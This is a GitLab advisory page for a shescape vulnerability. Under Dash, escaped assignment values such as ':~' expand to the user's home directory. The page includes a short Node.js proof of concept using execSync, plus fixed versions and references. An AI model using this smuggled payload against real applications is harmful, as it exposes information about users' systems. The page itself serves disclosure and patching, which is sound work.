Advisory Database
  • Advisories
  • Dependency Scanning
  1. npm
  2. ›
  3. shescape
  4. ›
  5. GHSA-q53c-4prm-w95q

GHSA-q53c-4prm-w95q: Shescape: Home-directory disclosure in assignment context on Unix with Dash

July 24, 2026

This impacts users of Shescape on Unix systems that explicitly configure shell to Dash, or true when the default shell is Dash, using the escape and escapeAll APIs in assignments prefixed to a command.

An attacker may be able to obtain the location of the home directory and, depending on how it is used, change the location on which a command operates in unexpected ways.

import * as cp from "node:child_process";
import { Shescape } from "shescape";

// 1. Prerequisites
const options = {
shell: "dash",
// Or
shell: true, // Only if the default shell is Dash
};

// 2. Payload
const payload = ":~";

// 3. Usage
const shescape = new Shescape(options);
let escapedPayload;

escapedPayload = shescape.escape(payload);
// Or
escapedPayload = shescape.escapeAll([payload]);

// And (example)
const result = cp.execSync(`V=${escapedPayload}; echo $V`, options);

// 4. Impact
console.log(result.toString());
// Outputs ":" followed by the user's home directory

References

  • github.com/advisories/GHSA-q53c-4prm-w95q
  • github.com/ericcornelissen/shescape/blob/dea8893a5877893d8d4923dbf253080e08899e6d/docs/migration.md
  • github.com/ericcornelissen/shescape/commit/43d70b59d09bbe5c3fd02ef08b3a123e977ed9de
  • github.com/ericcornelissen/shescape/commit/b4b34c394e7f9da2775bb75381066b9a228c425f
  • github.com/ericcornelissen/shescape/pull/2649
  • github.com/ericcornelissen/shescape/pull/2651
  • github.com/ericcornelissen/shescape/releases/tag/v2.1.14
  • github.com/ericcornelissen/shescape/releases/tag/v3.0.1
  • github.com/ericcornelissen/shescape/security/advisories/GHSA-q53c-4prm-w95q

Code Behaviors & Features

Detect and mitigate GHSA-q53c-4prm-w95q with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →

Affected versions

All versions before 2.1.14, all versions starting from 3.0.0 before 3.0.1

Fixed versions

  • 2.1.14
  • 3.0.1

Solution

Upgrade to versions 2.1.14, 3.0.1 or above.

Impact 6.5 MEDIUM

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Learn more about CVSS

Weakness

  • CWE-116: Improper Encoding or Escaping of Output
  • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Source file

npm/shescape/GHSA-q53c-4prm-w95q.yml

Spotted a mistake? Edit the file on GitLab.

  • Site Repo
  • About GitLab
  • Terms
  • Privacy Statement
  • Contact

Page generated Sat, 08 Aug 2026 00:18:55 +0000.